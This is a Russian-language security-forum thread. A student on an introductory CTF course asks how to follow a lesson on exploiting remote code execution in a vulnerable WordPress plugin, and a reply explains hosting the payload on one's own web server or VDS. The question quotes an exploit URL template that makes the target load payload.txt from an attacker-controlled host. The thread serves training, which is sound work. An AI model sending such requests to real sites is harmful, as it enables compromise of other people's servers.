HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 07.11.2025, 18:53
Lastweek
Новичок
Регистрация: 06.11.2025
Сообщений: 1
Провел на форуме:
353

Репутация: 0
По умолчанию

Всем доброго времени суток!
Проходя курс Введение в CTF столкнулся с проблемой
В Разделе 6 - Эксплуатируем RCE в уязвимом плагине WordPress
Согласно инструкции теперь нам нужно посетить следующую страницу - http://уязвимый_сервер/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://сервер_где_расположен_наш_ф айл/payload.txt:
  1. Указываем уязвимый сервер, не забывая про порт 18500.
  2. Указываем IP-адрес или домен нашего VDS, а также порт, который мы написали в команде с python3
Как найти "http://сервер_где_расположен_наш_ф айл/" ?
Что значит "Указываем IP-адрес или домен нашего VDS, а также порт, который мы написали в команде с python3"?
 
Ответить с цитированием

  #2  
Старый 10.11.2025, 15:09
Lunik
Новичок
Регистрация: 31.01.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:

Lastweek сказал(а):

Всем доброго времени суток!
Проходя курс Введение в CTF столкнулся с проблемой
В Разделе 6 - Эксплуатируем RCE в уязвимом плагине WordPress
Согласно инструкции теперь нам нужно посетить следующую страницу - http://уязвимый_сервер/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://сервер_где_расположен_наш_ф айл/payload.txt:
  1. Указываем уязвимый сервер, не забывая про порт 18500.
  2. Указываем IP-адрес или домен нашего VDS, а также порт, который мы написали в команде с python3
Как найти "http://сервер_где_расположен_наш_ф айл/" ?
Что значит "Указываем IP-адрес или домен нашего VDS, а также порт, который мы написали в команде с python3"?

Добрый день! Это значит вам нужно развернуть свои Web Сервер или воспользоваться готовым если у вас его нет. Развернуть вы его можете как у себя на домашнем ПК, не забыв настроить NAT (пробросить порты на роутере домашнем) или арендовать сервер VDS и там поднять Web Сервер
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.